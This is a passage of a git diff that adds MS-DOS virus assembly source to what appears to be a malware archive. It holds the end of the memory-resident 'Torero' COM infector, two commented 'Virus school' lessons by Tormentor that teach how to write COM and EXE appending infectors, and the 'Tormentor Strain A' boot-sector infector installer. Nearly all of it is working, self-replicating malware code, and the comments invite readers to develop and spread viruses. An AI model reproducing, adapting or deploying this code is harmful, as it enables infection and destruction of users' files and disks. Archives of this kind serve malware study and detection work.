bx,';)' ; Are we already + jne set_int_21h ; memory resident? + + push cs ; Save CS for the host + mov bx,ds ; Don't lose DS + xor ax,ax ; Jump to the memory + mov ds,ax ; copy and restore + push word ptr ds:[21h*4+2] ; the host header + push offset check_host + mov ds,bx + retf + +set_int_21h: mov ax,es + dec ax + mov ds,ax ; Program's MCB segment + xor di,di + + cmp byte ptr ds:[di],'Y' ; Is it a Z block? + jna set_int_21h + + sub word ptr ds:[di+3],((torero_size/10h)+2) + sub word ptr ds:[di+12h],((torero_size/10h)+2) + add ax,word ptr ds:[di+3] + inc ax + + mov ds,ax + mov byte ptr ds:[di],'Z' ; Mark block as Z + mov word ptr ds:[di+1],8 ; System memory + mov word ptr ds:[di+3],((torero_size/10h)+1) + mov word ptr ds:[di+8],4f44h ; Mark block as owned + mov word ptr ds:[di+0ah],0053h ; by DOS (444f53h,0) + inc ax + + cld + push cs + pop ds + mov es,ax + mov cx,torero_size ; Copy virus to memory + mov si,bp + rep movsb + + push es + push offset copy_vector ; Jump to the virus + retf ; copy in memory + +copy_vector: push ds + mov ds,cx + mov es,ax ; Save int 21h's + mov si,21h*4 ; original vector + lea di,old_int_21h + movsw + movsw + + mov word ptr [si-4],offset new_int_21h + mov word ptr [si-2],ax ; Set ours + + mov si,13h*4 ; Save int 13h's + lea di,old_int_13h ; original vector + movsw + movsw + + mov word ptr [si-4],offset new_int_13h + mov word ptr [si-2],ax ; Set ours + + mov ds,ax +check_host: call open_host ; Open the host + call get_sft ; Get its SFT for our + call check_mark ; infection mark + jb messed_up ; File is messed up :-( + + call read_entry ; Read the entry + call point_entry ; Point to the header + cmp word ptr ds:[si],0 ; Is it empty? + jne restore_header + + cmp word ptr ds:[si+2],0 ; Empty too? huh :-( + je messed_up ; File is messed up + +restore_header: pop es ; ES=host segment + push es ; Store it in the stack + mov di,100h ; file header from the + push di ; Store the IP + movsw ; DS:SI points to the + movsb ; original header, in + ; the directory entry + push es + pop ds ; DS=ES + retf ; Jump to the host + +messed_up: mov ah,3eh ; File is messed up... + int 21h ; close it and show + call emergency ; the Windows message :) + +; Ĵ Torero's int 13h handler + +new_int_13h: cmp ah,3 + je sector_write ; Sector write? + + db 0eah ; Jump back to the +old_int_13h dw ?,? ; original int 13h + +sector_write: push ax bx cx + pushf + + xor ah,ah ; Calculate how many + mov cl,4 ; files we must test + shl ax,cl ; by multiplying the + mov cx,ax ; sector number with + or cx,cx ; 10h (entries) + je bucle_end + +int_13h_bucle: cmp byte ptr es:[bx+9],'O' ; -O-? + jne more_files + + mov al,byte ptr es:[bx+9] + sub al,2 + cmp al,byte ptr es:[bx+0ah] ; -OM? + jne more_files + cmp al,'M' ; Then it's a COM + je subtract + +more_files: add bx,20h ; Look for more files + loop int_13h_bucle ; Look'n'loop :) + +bucle_end: popf + pop cx bx ax ; End of the bucle + ; Call the original + call int_13h ; int 13h and jump +xor_and_jump: xor ax,ax ; to the original int + +return_to_int: push bp ax + pushf + + pop ax ; Return to the + mov bp,sp ; original int 13h + mov word ptr ss:[bp+8],ax + + pop ax bp + retf 2 + +subtract: cmp byte ptr es:[bx],0e5h ; A deleted file... + je more_files ; bah, skip it + + cmp byte ptr es:[bx+0bh],80h ; Infected? + jb more_files + + cmp word ptr es:[bx+0ch],0 ; Is the header field + jne more_files ; empty? + + cmp word ptr es:[bx+0eh],0 + jne more_files + + mov ax,word ptr cs:[header_store] ; Ok, let's copy + mov word ptr es:[bx+0ch],ax ; the original file + ; header to the + mov ax,word ptr cs:[header_store+2] ; directory entry + mov word ptr es:[bx+0eh],ax + jmp more_files + +; Ĵ Torero's signature + +signature db 0dh,0ah,'[Torero :-) by Mister Sandman/29A]',0dh,0ah + +; Ĵ Torero's int 21h handler + +new_int_21h: cli + cmp ah,6ch ; This code is stolen + ja real_checks ; from the original + ; DOS kernel handler, + cmp ah,33h ; so they won't catch + jb real_checks ; us if they don't go + jz fake_stuff ; further thru the + ; rest of the code of + cmp ah,64h ; the handler... thanx + ja fake_stuff ; to Qark for this + jz real_checks ; cool idea :) + + cmp ah,51h + jz real_checks + + cmp ah,62h + jz fake_stuff + + cmp ah,50h + jz real_checks + +fake_stuff: push ax bx cx ; Shit, shit, shit, + nop ; shit... skip it + pop cx bx ax + +real_checks: cmp ah,30h + jne opening ; (get DOS version)? + + mov bx,';)' ; Return the smiley :) + iret + +opening: cmp ah,3dh ; File opening? + je file_open + + cmp ax,4301h ; Attribute change? + je new_attribute + + cmp ax,6c00h ; Extended open? + je file_open + +jmp_int_21h db 0eah ; Jump to the original +old_int_21h dw ?,? ; int 21h address + +; Ĵ File open + +file_open: call infect_file ; Infection routine + jmp dword ptr cs:[old_int_21h] ; Jump back to int 21h + +; Ĵ New attribute + +new_attribute: mov ah,30h ; Change 43h for 30h + iret ; so it will do nothing + +; Ĵ Infection routine + +infect_file: pushf + push ax bx cx dx ; Push registers, flags + push si di ds es ; and all that shit + + call set_int_24h ; Set int 24h + + cmp ah,6ch ; Extended open? + jne normal_open + + mov dx,si ; Fix it to DS:DX +normal_open: mov ax,3d00h ; Open the file + call int_21h + xchg bx,ax ; File handle in BX + + push cs ; CS=DS + pop ds + + call get_sft ; Get file's SFT + call check_mark ; Already infected? + jae close_and_pop + + mov byte ptr es:[di+2],2 ; Open mode=r/w + mov ax,word ptr es:[di+28h] ; Check the extension + cmp ax,'OC' ; of our victim + jne close_and_pop + + mov byte ptr cs:[infecting],1 + mov ah,3fh ; Read the first three + mov cx,3 ; bytes to our temporal + lea dx,header_store ; header store + call int_21h + + mov ax,word ptr es:[di+11h] ; File lenght in AX + cmp ax,0ea60h ; Too big file? + ja close_and_pop + + push ax ; Lseek to the end of + call lseek_end ; the file + + mov ah,40h ; Append our k-r4d + mov cx,torero_size ; code :) + lea dx,torero_start + call int_21h + + pop ax ; Make the jmp to + sub ax,3 ; our virus body + mov word ptr cs:[com_header+1],ax ; for the new file + call set_marker + + call lseek_start ; Lseek to the start + + mov ah,40h ; Write the new header + mov cx,3 ; in so we'll be always + lea dx,com_header ; executed first ;P + call int_21h + + mov ax,word ptr es:[di+11h] ; Actual size in AX + sub ax,3 ; Lseek to the position + call lseek_end ; of the original header + + mov ah,40h ; Destroy all the info, + mov cx,3 ; already stored in the + lea dx,garbage ; directory entry };) + call int_21h + +close_and_pop: mov ah,3eh ; Close the file + call int_21h + + call reset_int_24h ; Reset int 24h + + pop es ds di si ; And pop out all the + pop dx cx bx ax ; shit we pushed b4 + popf + ret + +; Ĵ Call to the original int 13h + +int_13h: pushf + call dword ptr cs:[old_int_13h] ; Call the original + ret ; int 13h + +; Ĵ Call to the original int 21h + +int_21h: pushf + call dword ptr cs:[old_int_21h] ; Call the original + ret ; int 21h + +; Ĵ Get SFT in ES:DI + +get_sft: push ax bx + mov ax,1220h ; Get job file table + int 2fh ; in ES:DI (DOS 3+) + jc bad_sft + + xor bx,bx ; Get the address of + mov ax,1216h ; the specific SFT for + mov bl,byte ptr es:[di] ; our handle + int 2fh + +bad_sft: pop bx ax ; Pop registers and + ret ; return to the code + +; Ĵ Check our infection mark + +check_mark: cmp byte ptr es:[di+4],80h ; Compare with the min. + ret ; value of our mark + +; Ĵ Read the directory entry + +read_entry: push ax bx cx + call parameters ; Load the sector + int 25h + + pop cx cx bx ax + ret + +; Ĵ Sector loading + +parameters: mov ax,word ptr es:[di+1bh] ; Load the sector + mov word ptr cs:[control_block],ax ; number in our + mov ax,word ptr es:[di+1dh] ; control block + mov word ptr cs:[control_block+2],ax ; Read a long + mov cx,0ffffh ; sector, 4 bytes + + push cs ; CS=DS + pop ds + + mov word ptr cs:[control_block+4],1 ; One sector + mov word ptr cs:[control_block+6],offset sector + mov word ptr cs:[control_block+8],cs + lea bx,control_block ; Control block + + push ds si + lds si,dword ptr es:[di+7] ; Point to the + lodsb ; DPB + pop si ds + ret + +; Ĵ Point to the original header + +point_entry: mov al,byte ptr es:[di+1fh] ; Guess the entry + xor ah,ah + + push cx + mov cl,5 ; Multiply it*20h + shl ax,cl + pop cx + + lea si,sector ; Calculate its offset + add si,ax ; into the sector and + add si,0ch ; move to si+0ch (header) + ret + +; Ĵ Set int 24h + +set_int_24h: push ax si di + push ds es + + xor ax,ax ; Point to the IVT + mov ds,ax + + push cs ; CS=ES + pop es + + mov si,24h*4 ; Save the original int + mov di,offset old_int_24h ; 24h address and set + cld ; ours l8r + movsw + movsw + + mov word ptr [si-4],offset new_int_24h + mov word ptr [si-2],cs + + pop es ds + pop di si ax + ret + +; Ĵ Restore int 24h + +reset_int_24h: push ax si di + push ds es + + xor ax,ax ; Point to the IVT + mov es,ax + + push cs ; CS=DS + pop ds + + mov si,offset old_int_24h ; Restore the original + mov di,24h*4 ; int 24h address + cld + movsw + movsw + + pop es ds + pop di si ax + ret + +; Ĵ Torero's int 24h handler + +new_int_24h: mov al,3 ; Pass the error code + iret + +old_int_24h: dw ?,? ; Original int 24h + +; Ĵ Set our infection mark + +set_marker: mov byte ptr es:[di+4],80h ; Attribute bit 8 + ret + +; Ĵ Lseek to the start of the file + +lseek_start: mov word ptr es:[di+15h],0 ; Read pointer=0 + ret + +; Ĵ Lseek to the end of the file + +lseek_end: mov word ptr es:[di+15h],ax ; Read pointer=file + ret ; length (EOF) + +; Ĵ Open the host we're being executed from + +open_host: mov ah,62h ; Get PSP address + int 21h + + push es + mov ds,bx + mov bx,word ptr ds:[2ch] ; DS:2ch=PSP segment + mov es,bx + xor di,di + + mov al,1 ; Look for 01h (the + mov cx,0ffffh ; mark which sepparates + repnz scasb ; the path from the + jnz emergency ; name of the file that + ; is being executed) + xor al,al + scasb + + push es + pop ds es + + mov ah,3dh ; Open the host + mov dx,di + call int_21h + xchg bx,ax ; Pass handle to BX + ret ; and return + +; Ĵ Emergency routine... data lost! + +emergency: push cs ; CS=DS + pop ds + + mov ah,9 ; Show the message... + lea dx,windows ; This programs requires + int 21h ; Microsoft Windows + + mov ax,4c01h ; Errorlevel=01 :) + int 21h + +; Ĵ Data area + +sector db 200h dup (?) ; The long sector + +control_block dd ? ; Control block + dw ? +garbage dd ? + db ';)' + +windows db 'This program requires Microsoft Windows.' + db 0dh,0ah,'$' + +action db ? ; Reading or writing? +infecting db ? + +com_header db 0e9h,?,? ; The COM header +header_store db 3 dup (?) ; Temporal header store + +torero_end label byte + +torero ends + end torero_start diff --git a/MSDOS/Virus.MSDOS.Unknown.torm-205.asm b/MSDOS/Virus.MSDOS.Unknown.torm-205.asm new file mode 100644 index 00000000..0cd988f8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.torm-205.asm @@ -0,0 +1,158 @@ +; +; Virus school, lession 1 (c) 1992 Tormentor [Demoralized Youth] +; +; This is the first lession on how to make an own virus. +; Hope you'll learn something of it... +; To be compiled with TASM 3.0 or higher. +; +; This virus is quite dumb and 'noisy' +; It updates the filedate and time, changes DTA before execution causing +; some progs to belive they are executed with parameters... +; But this should only be a 'raw' virus that you can develop. +; Certain program may hang, so i recommend you not to spread to geeks +; since there is MANY better viruses to use for such nice purpose. +; +; If you want to conntact me or other virus-writers call me on my board: +; Swedish Virus Laboratory +46-3191-9393 +; +; Greetings to All virus-writers! +; + + + .model tiny + .radix 16 + .code + +Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus. + + org 100 + +dummy_code: db 'M' ; Mark file as infected. + db 3 DUP(90) ; This is to simulate a infected prog. + ; Not included in virus-code. + +Virus_Start: call where_we_are ; Now we call the next bytes, just to + ; know what address virus lies on. +where_we_are: pop si ; Since the virus-code's address will + ; differ from victim to victim. + ; a POP SI after a call will give us the + ; address which equals to 'where_we_are' + ; Very important. + +;----------------------------------------------------------------------- +; Now we have to put back the original 4 bytes in the host program, so +; we can return control to it later: + + add si,_4first_bytes-where_we_are + mov di,100 + cld + movsw + movsw + +;------------------------------------------------------------------------ + +; We have to use SI as a reference since files differ in size thus making +; virus to be located at different addresses. + + sub si,_4first_bytes-Virus_Start+4 + +;------------------------------------------------------------------------ +; Now we just have to find victims, we will look for ALL .COM files in +; the current directory. + + mov ah,4e ; We start to look for a *.COM file +look4victim: mov dx,offset file_match-Virus_Start + add dx,si + int 21 + + jc no_victim_found ; If no *.COM files was found. + + mov ax,3d02 ; Now we open the file. + mov dx,9e ; The found victims name is at ds:009e + int 21 ; in DTA. + + jc cant_open_file ; If file couldn't be open. + + xchg ax,bx ; Save filehandle in bx +; (we could use MOV BX,AX but we saves one byte by using xchg ) + + mov ah,3f ; Now we read the first 4 bytes + mov cx,4 ; from the victim -> buffer + + mov dx,offset _4first_bytes-Virus_Start + add dx,si + ; We will then overwrite them with + int 21 ; a JMP XXXX to virus-code at end. + + jc read_error + + cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M' + jz sick_or_EXE ; Check if infected OR *.EXE +; Almost all EXE files starts with 'M' and we mark the infected files by +; starting with 'M' which equals to DEC BP +; Now we just have to have one check instead of 2 (infected and *.EXE) + + mov ax,4202 ; Position file-pointer to point at + xor cx,cx ; End-of-File. + xor dx,dx ; Any writing to file will now APPEND it + int 21 ; Returns AX -> at end. + + sub ax,4 ; Just for the JMP structure. + + mov word ptr ds:[_4new_bytes+2],ax + ; Build new JMP XXXX to virus. + ; ( logic: JMP AX ) + + mov ah,40 ; Append file with virus code. + mov cx,offset Virus_Lenght + ; File-size will increase with + mov dx,si ; Virus_Lenght. + int 21 + + jc write_error + + mov ax,4200 ; Position file-pointer to begin of file + xor cx,cx ; So we can change the first 3 bytes + xor dx,dx ; to JMP to virus. + int 21 + + mov ah,40 ; Write new 3 bytes. + mov cx,4 ; After this, executing the file will + mov dx,offset _4new_bytes-Virus_Start + add dx,si + ; result in virus-code executing before + int 21 ; original code. + ; (And more files will be infected) + + jc write_error + + mov ah,3e ; Close file, now file is infected. + int 21 ; Dos function 3E (close handle) + +Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's + jmp look4victim ; find another victim... + +write_error: ; Here you can test whats went wrong. +read_error: ; This is just for debugging purpose. +cant_open_file: ; These entries are equal to eachother +no_victim_found: ; but could be changed if you need to test something. + + mov ax,100 ; Every thing is put back in memory, + push ax ; lets us RET back to start of program + ret ; and execute the original program. + +notes db ' (c) 1992 Tormentor ,Swedish Virus Laboratory' + db ' / Demoralized Youth / ' + +file_match db '*.COM',0 ; Pattern to search for. + ; Don't forget to end with 0 ! + +_4first_bytes: ret ; Here we save the 4 first org. bytes + db 3 DUP(0) +; We have a ret here since this file isn't a REAL infection. + +_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes + ; so our virus-code will be run first. +Virus_End EQU $ + + end dummy_code diff --git a/MSDOS/Virus.MSDOS.Unknown.torm-358.asm b/MSDOS/Virus.MSDOS.Unknown.torm-358.asm new file mode 100644 index 00000000..1040c1f6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.torm-358.asm @@ -0,0 +1,160 @@ +; +; Virus Lession #2 'How to make a non-resident EXE infector' +; +; (c) 1992 Tormentor // Demoralized Youth +; +; Well, I had not time to comment this code as much as I wanted to, +; but here you are. +; What can be hard to understand is the .EXE header changes, but if +; you look at the description on the header (ex: Norton guide Tech. Ref) +; you'll understand... +; Anyway, feel free to use this example and if you have any questions +; or anything call my board: Swedish Virus Labratory +46-3191-9393 +; +; Greetings to all virus-writers! +; +; /Tormentor +; + + + + .model tiny + .radix 16 + .code + +Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus. + + org 100 + +Virus_Start: call where_we_are + +where_we_are: pop si + + sub si,where_we_are-Virus_Start + + mov ax,es + add ax,10 + add ax,cs:[si+Exe_header-Virus_Start+16] + push ax + push cs:[si+Exe_header-Virus_Start+14] + + push ds + push cs + pop ds + + mov ah,1a + mov dx,offset Own_dta-Virus_Start + add dx,si + int 21 + + mov ah,4e ; We start to look for a *.EXE file +look4victim: mov dx,offset file_match-Virus_Start + add dx,si + int 21 + + jnc cont2 + jmp no_victim_found ; If no *.EXE files was found. + +cont2: mov ax,3d02 + mov dx,Own_dta-Virus_Start+1e + add dx,si + int 21 + + jnc cont1 + jmp cant_open_file + +cont1: xchg ax,bx + + mov ah,3f + mov cx,1c + mov dx,offset Exe_header-Virus_Start + add dx,si + int 21 + + jc read_error + + cmp byte ptr ds:[si+Exe_header-Virus_Start],'M' + jnz no_exe ; !!! Some EXEs starts with ZM !!! + cmp word ptr ds:[si+Exe_header-Virus_Start+12],'DY' + jz infected + + mov ax,4202 ; Go EOF + xor cx,cx + xor dx,dx + int 21 + + push dx + push ax + + mov ah,40 ; Write virus to EOF. + mov cx,Virus_Lenght + mov dx,si + int 21 + + mov ax,4202 ; Get NEW filelenght. + xor cx,cx + xor dx,dx + int 21 + + mov cx,200 + div cx + inc ax + mov word ptr ds:[Exe_header-Virus_Start+2+si],dx + mov word ptr ds:[Exe_header-Virus_Start+4+si],ax + + pop ax + pop dx + + mov cx,10 + div cx + sub ax,word ptr ds:[Exe_header-Virus_Start+8+si] + mov word ptr ds:[Exe_header-Virus_Start+16+si],ax + mov word ptr ds:[Exe_header-Virus_Start+14+si],dx + + mov word ptr ds:[Exe_header-Virus_Start+12+si],'DY' + + mov ax,4200 ; Position file-pointer to begin of file + xor cx,cx + xor dx,dx + int 21 + + mov ah,40 ; Write header + mov cx,1c + mov dx,offset Exe_header-Virus_Start + add dx,si + int 21 + + jc write_error + +no_exe: +infected: + mov ah,3e + int 21 + +Sick_or_EXE: mov ah,4f + jmp look4victim + +write_error: ; Here you can test whats went wrong. +read_error: ; This is just for debugging purpose. +cant_open_file: ; These entries are equal to eachother +no_victim_found: ; but could be changed if you need to test something. + + pop ds + retf + +file_match db '*.EXE',0 ; Pattern to search for. + ; Don't forget to end with 0 ! + +Exe_header db 16 DUP(0) + dw 0fff0 ; Adjustment just for this COM-file. + db 4 DUP(0) + +notes db '(c) 1992 Tormentor / Demoralized Youth ',0a,0d + db 'Rather first in hell, than second in heaven.' + +Own_Dta db 02bh DUP(0) + +Virus_End EQU $ + + end Virus_Start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.torment.asm b/MSDOS/Virus.MSDOS.Unknown.torment.asm new file mode 100644 index 00000000..956c8c20 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.torment.asm @@ -0,0 +1,543 @@ +code_seg segment + assume cs:code_seg,ds:code_seg + + org 100h + +tormentor proc far + +@disp macro string + mov dx,offset string + mov ah,09h + int 21h +endm + +@exit macro + mov ax,4c00h + int 21h +endm + +@cls macro mode + mov ah,00h + mov al,mode + int 10h +endm + +start: jmp main + +boot_area dw 256 dup (0) +boot_sec dw 512 dup (0) + +message db "Tormentor Strain A",13,10 + db "Written by The High Evolutionary",13,10 + db "Copyright (C) 1991 by The RABID Nat'nl Development Corp." + db 13,10,13,10 + db "Press any key to install onto media in drive A:",13,10 + db "(Or press CTRL-C to abort)$",13,10 + +paused db 13,10,13,10 + db "[Paused] Insert destination disk if desired and press",13,10 + db "any key, otherwise, press any key$",13,10 + +done db "Done!$",13,10 + +r_fail db 13,10,13,10 + db "Failed to READ in boot sector$",13,10 + +w_fail db 13,10,13,10 + db "Failed to WRITE boot sector$",13,10 + +f_infec db 13,10,13,10 + db "SHIT! We failed to write the virus code to the disk!!!$",13,10 + +r_boot db 13,10,13,10 + db "Now READING in the boot sector$",13,10 + +w_boot db 13,10,13,10 + db "Now WRITING the boot sector to track 719$",13,10 + +w_vir db 13,10,13,10 + db "Now WRITING the VIRUS to the boot sector$",13,10 + +succ db 13,10,13,10 + db "Success! We installed Tormentor onto the drive$",13,10 + +memerr db 13,10,13,10 + db "BOMB! We had a memory allocation error. Bailing out...$",13,10 + db 13,10 + +read_shit db 13,10,13,10 + db "Reading in shit via INT 25...$",13,10 + db 13,10 + +intro db "You are in Torment$",13,10 + +bootseg dw ? ; Storage segment address or mem. block + ; containing copy of boot record + +dssave dw ? ; Storage for DS register +;dssave dw seg group ; Storage for DS register + +pspseg dw ? ; PSP segment storage + +;stack segment para stack 'STACK' ; Code Segment +;stack ends + +;_data segment word public 'DATA' ; Data Segment +;_data ends + +;dgroup group data,stack ; Define segment group + +;***************************************************************************** +; Boot record information to infect both floppies and hard-drives +;***************************************************************************** + +bootrecord struc +bootjump db 3 dup (?) ; Initial 3 byte jmp instruction +oemstring db 8 dup (?) ; OEM version and DOS +sectorbytes dw ? ; Bytes per sector +clustersec db ? ; Sectors per cluster +reservedrec dw ? ; Reserved sectors +fatcopies db ? ; number of FAT copies +direntries dw ? ; number of root dir entries +totalsectors dw ? ; Total disk sectors +mediadescrip db ? ; Media Descriptor +fatsectors dw ? ; number of sectors occupied by 1 FAT +tracksectors dw ? ; number of sectors per track +heads dw ? ; number of heads +hiddensectors dw ? ; number of hidden sectors +bootrecord ends + +drive db ? ; Current drive pointer + +memalloc proc near + + push bp ; Save base pointer + push bx ; Save BX + mov bp,sp ; init base pointer + xor al,al ; Zero out AL + mov ah,48h ; Allocate mem. function + int 21h + jnc end_memalloc ; exit if no error + mov word ptr [bp],bx + +end_memalloc: + pop bx ; Restore BX + pop bp ; Restore Base Pointer + ret + +memalloc endp + +main: + +get_default_drive: + mov ah,19h + int 21h + mov byte ptr drive,al ; Move current drive into drive + + +; mov ds,dssave ; Initialise DS +; mov ax,es ; get PSP address +; mov word ptr pspseg,ax ; and save it... + + jmp read_boot + +; mov bx,40h ; Allocate 1024 bytes +; call memalloc ; Allocate BX block of memory +; jnc read_boot +; @disp memerr +; jmp quit + +read_boot: + @disp read_shit + mov ah,08h + int 21h + mov word ptr bootseg,ax + push ax ; Save AX onto the stack + mov al,0 +; mov al,byte ptr drive ; Move current drive into AL + xor ah,ah ; Zero out AH +; pop ds ; Restore Data_seg + pushf ; Save flags + mov dx,0 ; Read in sector 0 + mov cx,1 ; Read in 1 sector + mov bx,offset boot_sec ; Store data at DS:boot_sec + int 25h ; Read in the disk + popf ; clear flags used by flags + @disp done + mov ah,08h + int 21h +; assume ds:code_seg ; Restore DS + +begin: @cls 03 +; mov ah,00 ; Set screen +; mov al,03 ; Set screen for 80x25 color +; int 10h ; Call BIOS + @disp message + + mov ah,08h ; Wait for a keypress + int 21h + mov cx,3 + +read_sector: + @disp r_boot ; Display that we are reading the + ; sector from the disk + push cx ; Counter is pushed onto the stack + mov ax,201h ; Read in 1 sector + mov bx,offset boot_area ; Store it in boot_area + mov cx,1 ; Set counter to 1 + mov dx,0 ; Set for drive 0, head 0 + int 13h ; Call BIOS + pop cx ; Restore counter + jnc good_read ; If there were no errors, then + ; jump to good_read + loop read_sector ; Jump back and try reading the sector + ; again while CX>0 + @disp r_fail + mov ax,4c00h ; Exit + int 21h ; Call DOS + +good_read: + mov cx,3 ; Set counter to 3 + @disp paused ; Display message for pause + mov ah,08h ; Wait for a key + int 21h ; Call DOS + +;***************************************************************************** +; Write good sector to track 719 (Head 1, track 27, sector 9) +;***************************************************************************** + +write_sector: + @disp w_boot ; Display that we are writing the + ; sector to disk + mov ax,301h ; Set for writing the boot sector + mov bx,offset boot_area ; Set buffer to what we read in +; mov bx,offset infected_data + mov cx,2709h ; Set counter to 2709h + mov dx,100h ; Head 1, drive 0 + int 13h ; Call BIOS + pop cx ; Restore the counter + jnc good_write ; If we wrote the sectors allright, + ; then jump to good_write + loop write_sector + @disp w_fail + mov ax,4c00h ; Exit + int 21h ; Call DOS + +good_write: + mov cx,3 ; Copy 3 into CX + @disp w_vir +infect_floppy: + push cx ; Push it onto the stack + mov ax,301h ; Write 1 sector + mov bx,offset infected_data ; Write corrupt boot sector to the + ; drive + mov cx,1 ; Set counter to 1 + mov dx,0 ; Set for drive A: + int 13h ; Call BIOS + jnc good_infection ; If there are no problems, then + ; continue + loop infect_floppy ; Otherwise, try again until CX=0 + @disp f_infec ; If CX=0, then display the message + ; and then exit + mov ax,4c00h ; Exit + int 21h ; Call DOS + +good_infection: + @disp succ + mov ax,4c00h + int 21h + +;***************************************************************************** +; The following is a copy of the infected boot sector to copy to sector 0 +;***************************************************************************** + +infected_data db 0EBh, 34h + nop + dec cx + inc dx + dec bp + and [bx+si],ah + xor bp,word ptr ds:[33h] + add al,[bp+si] + add [bx+si],ax + add dh,[bx+si+0] + rol byte ptr [bp+si],1 ; Rotate + std ; Set direction flag + add al,[bx+si] + or [bx+si],ax + add al,[bx+si] + db 19 dup (0) +; db 'Tormentor Strain A - RABID Nat''nl Development Corp.' + adc al,[bx+si] + add [bx+si],al + add [bx+di],al + add dl,bh + xor ax,ax ; Zero register + mov ds,ax + mov ss,ax + mov bx,7C00h ; Pointer to boot segment + mov sp,bx + push ds +data_14 db 53h + dec word ptr ds:[413h] + int 12h ; Put (memory size)/1K in ax + mov cl,6 + shl ax,cl ; Shift w/zeros fill + mov es,ax + xchg ax,word ptr ds:[4Eh] + mov word ptr ds:[7DABh],ax + mov ax,128h + xchg ax,word ptr ds:[4Ch] + mov word ptr ds:[7DA9h],ax + mov ax,es + xchg ax,word ptr ds:[66h] + mov word ptr ds:[7DAFh],ax + mov ax,0BBh + xchg ax,word ptr ds:[64h] + mov word ptr ds:[7DADh],ax + xor di,di ; Zero register + mov si,bx + mov cx,100h + cld ; Clear direction + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + sti ; Enable interrupts + push es + mov ax,85h + push ax + retf + push bx + xor dl,dl ; Zero register + call sub_2 ; (00FB) + pop bx + push ds + pop es + mov ah,2 + mov dh,1 + call sub_6 ; (011F) + jc loc_2 ; Jump if carry Set + push cs + pop ds + mov si,offset ds:[0Bh] + mov di,offset ds:[7C0Bh] + mov cx,2Bh + cld ; Clear direction + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + jz loc_ret_3 ; Jump if zero +loc_2: + pop bx + pop ax + push cs + mov ax,0AFh + push ax + +loc_ret_3: + retf ; Return far +read_error: + push cs + pop ds + mov si,1DBh + call sub_1 ; (00DA) + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + xor ax,ax ; Zero register + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + push cs + pop es + mov bx,offset ds:[200h] + mov cx,6 + xor dx,dx ; Zero register + mov ax,201h + int 13h ; Disk dl=drive a ah=func 02h + ; read sectors to memory es:bx + jc read_error ; Jump if carry Set + mov cx,0FF0h + mov ds,cx + jmp dword ptr cs:data_16 + +; +; Insert Tormentor endp here... +; +;tormentor endp + + +; +; SUBROUTINE +; + +sub_1 proc near +loc_5: + mov bx,7 + cld ; Clear direction + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_9 ; Jump if zero + jns loc_6 ; Jump if not sign + xor al,0D7h + or bl,88h +loc_6: + cmp al,20h + jbe loc_7 ; Jump if below or = + mov cx,1 + mov ah,9 ; + int 10h ; Video display ah=functn 09h + ; set char al & attrib bl @curs +loc_7: + mov ah,0Eh + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_5 ; (00DA) + +; External Entry into Subroutine + +sub_2: + mov bx,200h + mov cx,2 + mov ah,cl + call sub_5 ; (011D) + mov cx,2709h + xor byte ptr es:[bx],0FDh + jz loc_8 ; Jump if zero + mov cx,4F0Fh +loc_8: + jmp short loc_ret_9 ; (0127) + nop + +; External Entry into Subroutine + +sub_3: + mov ah,2 + mov bx,200h + +; External Entry into Subroutine + +sub_4: + mov cx,1 + +; External Entry into Subroutine + +sub_5: + mov dh,0 + +; External Entry into Subroutine + +sub_6: + mov al,1 + +; External Entry into Subroutine + +sub_7: + pushf ; Push flags + call dword ptr cs:data_15 + +loc_ret_9: + retn +sub_1 endp + + push ax + push bx + push cx + push dx + push es + push ds + push si + push di + pushf ; Push flags + push cs + pop ds + cmp dl,1 + ja loc_11 ; Jump if above + and ax,0FE00h + jz loc_11 ; Jump if zero + xchg al,ch + shl al,1 ; Shift w/zeros fill + add al,dh + mov ah,9 + mul ah ; ax = reg * al + add ax,cx + sub al,6 + cmp ax,6 + ja loc_11 ; Jump if above + push cs + pop es + call sub_3 ; (0115) + jc loc_10 ; Jump if carry Set + mov di,offset data_14 + mov si,offset ds:[243h] + mov cx,0Eh + std ; Set direction flag + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to + ; es:[di] + jz loc_11 ; Jump if zero + sub si,cx + sub di,cx + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to + ; es:[di] + call sub_2 ; (00FB) + push cx + push bx + call sub_3 ; (0115) + mov ah,3 + xor bx,bx ; Zero register + call sub_4 ; (011A) + pop bx + pop cx + jc loc_10 ; Jump if carry Set + mov dh,1 + mov ah,3 + call sub_6 ; (011F) +loc_10: + xor ax,ax ; Zero register + call sub_7 ; (0121) +loc_11: + mov ah,4 + int 1Ah ; Real time clock ah=func 04h + ; read date cx=year, dx=mon/day + cmp dh,9 + jne not_month ; Jump if not equal + mov si,1B1h + call sub_1 ; (00DA) +not_month: + popf ; Pop flags + pop di + pop si + pop ds + pop es + pop dx + pop cx + pop bx + pop ax + jmp dword ptr cs:data_15 +data_15 dd 0C602EC59h +data_16 dd 0F000E6F2h + esc 2,ch ; coprocessor escape + and [bp+di-4141h],al + movsb ; Mov [si] to es:[di] + idiv word ptr [bp-85Ch] ; ax,dxrem=dx:ax/data + xchg ax,si + mov si,offset ds:[0B4A5h] + mov ax,0DAA7h + esc 5,[bx+si] ; coprocessor escape + db 'IO SYSMSDOS SYS', 0Dh, 0Ah + db 'Non-system disk or disk error', 0Dh + db 0Ah + add [bx+si],al + push bp +; jmp cont + +; db 'Tormentor Strain A - RABID Nat''nl Development Corp.' + stosb +;cont: stosb ; Store al to es:[di] + +tormentor endp + +quit: mov ax,4c00h + int 21h + + + code_seg ends +end start + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.totoro.asm 